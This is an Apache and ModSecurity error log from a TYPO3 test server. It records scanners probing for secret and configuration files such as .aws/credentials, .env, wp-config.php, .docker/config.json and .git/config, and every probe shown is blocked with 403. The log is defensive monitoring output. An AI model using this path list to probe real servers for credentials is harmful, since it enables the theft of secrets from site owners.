[Fri May 30 17:13:10.765452 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDnLBqfe6YUdhe6un0PQCQAAAAE"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Fri May 30 17:13:10.765731 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDnLBqfe6YUdhe6un0PQCQAAAAE"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Fri May 30 17:13:10.765928 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDnLBqfe6YUdhe6un0PQCQAAAAE"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Fri May 30 17:13:11.184510 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDnLB6fe6YUdhe6un0PQCgAAAAE"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Fri May 30 17:13:11.184799 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDnLB6fe6YUdhe6un0PQCgAAAAE"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Fri May 30 17:13:11.185000 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDnLB6fe6YUdhe6un0PQCgAAAAE"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Fri May 30 17:13:11.502423 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDnLB6fe6YUdhe6un0PQCwAAAAE"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Fri May 30 17:13:11.502719 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDnLB6fe6YUdhe6un0PQCwAAAAE"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Fri May 30 17:13:11.502918 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDnLB6fe6YUdhe6un0PQCwAAAAE"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Fri May 30 17:13:13.466204 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yml, referer: http://surf.test.indacotrentino.com/serverless.yml
[Fri May 30 17:13:13.783841 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yml, referer: http://surf.test.indacotrentino.com/serverless.yml
[Fri May 30 17:13:14.202371 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yaml, referer: http://surf.test.indacotrentino.com/serverless.yaml
[Fri May 30 17:13:14.519280 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yaml, referer: http://surf.test.indacotrentino.com/serverless.yaml
[Fri May 30 17:13:15.709976 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json, referer: http://surf.test.indacotrentino.com/composer.json
[Fri May 30 17:13:16.026915 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json, referer: http://surf.test.indacotrentino.com/composer.json
[Fri May 30 17:13:16.446165 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDnLDKfe6YUdhe6un0PQGAAAAAE"], referer: http://surf.test.indacotrentino.com/package.json
[Fri May 30 17:13:16.446461 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDnLDKfe6YUdhe6un0PQGAAAAAE"], referer: http://surf.test.indacotrentino.com/package.json
[Fri May 30 17:13:16.446633 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDnLDKfe6YUdhe6un0PQGAAAAAE"], referer: http://surf.test.indacotrentino.com/package.json
[Fri May 30 17:13:17.233497 2025] [:error] [pid 3515322] [client 129.146.124.161:56556] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDnLDS695Jzu-XqReccBHgAAAAk"], referer: http://surf.test.indacotrentino.com/package.json
[Fri May 30 17:13:17.233799 2025] [:error] [pid 3515322] [client 129.146.124.161:56556] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDnLDS695Jzu-XqReccBHgAAAAk"], referer: http://surf.test.indacotrentino.com/package.json
[Fri May 30 17:13:17.233983 2025] [:error] [pid 3515322] [client 129.146.124.161:56556] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aDnLDS695Jzu-XqReccBHgAAAAk"], referer: http://surf.test.indacotrentino.com/package.json
[Fri May 30 17:13:17.647211 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml, referer: http://surf.test.indacotrentino.com/.travis.yml
[Fri May 30 17:13:17.960190 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml, referer: http://surf.test.indacotrentino.com/.travis.yml
[Fri May 30 17:13:18.374910 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci, referer: http://surf.test.indacotrentino.com/.circleci/configs/development.yml
[Fri May 30 17:13:18.688045 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci, referer: http://surf.test.indacotrentino.com/.circleci/configs/development.yml
[Fri May 30 17:13:19.104198 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app, referer: http://surf.test.indacotrentino.com/app/config/parameters.yml
[Fri May 30 17:13:19.417484 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app, referer: http://surf.test.indacotrentino.com/app/config/parameters.yml
[Fri May 30 17:13:19.831282 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/parameters.yml
[Fri May 30 17:13:20.144372 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/parameters.yml
[Fri May 30 17:13:20.559272 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/local.yml
[Fri May 30 17:13:20.872482 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/local.yml
[Fri May 30 17:13:21.286744 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/application.yml
[Fri May 30 17:13:21.599976 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/application.yml
[Fri May 30 17:13:22.788576 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/settings.yml
[Fri May 30 17:13:23.101928 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/settings.yml
[Fri May 30 17:13:25.811999 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/keys.yml, referer: http://surf.test.indacotrentino.com/keys.yml
[Fri May 30 17:13:26.125111 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/keys.yml, referer: http://surf.test.indacotrentino.com/keys.yml
[Fri May 30 17:13:45.625978 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yaml, referer: http://surf.test.indacotrentino.com/swagger.yaml
[Fri May 30 17:13:45.939151 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yaml, referer: http://surf.test.indacotrentino.com/swagger.yaml
[Fri May 30 17:13:46.353386 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yml, referer: http://surf.test.indacotrentino.com/swagger.yml
[Fri May 30 17:13:46.666412 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yml, referer: http://surf.test.indacotrentino.com/swagger.yml
[Fri May 30 17:13:47.845889 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yaml
[Fri May 30 17:13:48.159130 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yaml
[Fri May 30 17:13:48.574347 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yml
[Fri May 30 17:13:48.890088 2025] [authz_core:error] [pid 3515322] [client 129.146.124.161:56556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api, referer: http://surf.test.indacotrentino.com/api/swagger.yml
[Fri May 30 17:14:03.755739 2025] [:error] [pid 3513599] [client 129.146.124.161:34904] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/webpack.config.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /webpack.config.js found within REQUEST_FILENAME: /webpack.config.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDnLOxUzF6T0D_0vGLuuyQAAAAA"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Fri May 30 17:14:03.756018 2025] [:error] [pid 3513599] [client 129.146.124.161:34904] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDnLOxUzF6T0D_0vGLuuyQAAAAA"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Fri May 30 17:14:03.756227 2025] [:error] [pid 3513599] [client 129.146.124.161:34904] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDnLOxUzF6T0D_0vGLuuyQAAAAA"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Fri May 30 17:14:04.073223 2025] [:error] [pid 3513599] [client 129.146.124.161:34904] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/webpack.config.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /webpack.config.js found within REQUEST_FILENAME: /webpack.config.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDnLPBUzF6T0D_0vGLuuygAAAAA"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Fri May 30 17:14:04.073488 2025] [:error] [pid 3513599] [client 129.146.124.161:34904] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDnLPBUzF6T0D_0vGLuuygAAAAA"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Fri May 30 17:14:04.073675 2025] [:error] [pid 3513599] [client 129.146.124.161:34904] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aDnLPBUzF6T0D_0vGLuuygAAAAA"], referer: http://surf.test.indacotrentino.com/webpack.config.js
[Fri May 30 17:14:07.572658 2025] [authz_core:error] [pid 3513599] [client 129.146.124.161:34904] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/config
[Fri May 30 17:14:07.889868 2025] [authz_core:error] [pid 3513599] [client 129.146.124.161:34904] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/config
[Fri May 30 17:14:08.308616 2025] [authz_core:error] [pid 3513599] [client 129.146.124.161:34904] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitconfig, referer: http://surf.test.indacotrentino.com/.gitconfig
[Fri May 30 17:14:08.625673 2025] [authz_core:error] [pid 3513599] [client 129.146.124.161:34904] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitconfig, referer: http://surf.test.indacotrentino.com/.gitconfig
[Sun Jun 01 11:26:21.306058 2025] [authz_core:error] [pid 3558353] [client 198.55.98.210:50632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jun 01 17:30:01.071278 2025] [authz_core:error] [pid 3558358] [client 93.123.109.105:56994] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jun 01 23:02:57.963301 2025] [authz_core:error] [pid 3558353] [client 3.81.53.186:49884] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jun 02 23:58:46.624192 2025] [authz_core:error] [pid 3579984] [client 34.90.174.1:54758] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jun 03 13:07:40.042381 2025] [authz_core:error] [pid 3601621] [client 185.177.72.179:17542] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jun 07 01:37:11.521545 2025] [authz_core:error] [pid 3685921] [client 3.88.55.155:59596] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jun 07 07:35:38.465419 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEPPqp11M0k3qkbFlHbjtwAAAAQ"]
[Sat Jun 07 07:35:38.465691 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEPPqp11M0k3qkbFlHbjtwAAAAQ"]
[Sat Jun 07 07:35:38.465868 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEPPqp11M0k3qkbFlHbjtwAAAAQ"]
[Sat Jun 07 07:35:38.538524 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEPPqp11M0k3qkbFlHbjuQAAAAQ"]
[Sat Jun 07 07:35:38.538764 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEPPqp11M0k3qkbFlHbjuQAAAAQ"]
[Sat Jun 07 07:35:38.538929 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEPPqp11M0k3qkbFlHbjuQAAAAQ"]
[Sat Jun 07 07:35:38.560513 2025] [authz_core:error] [pid 3688254] [client 185.177.72.204:22618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
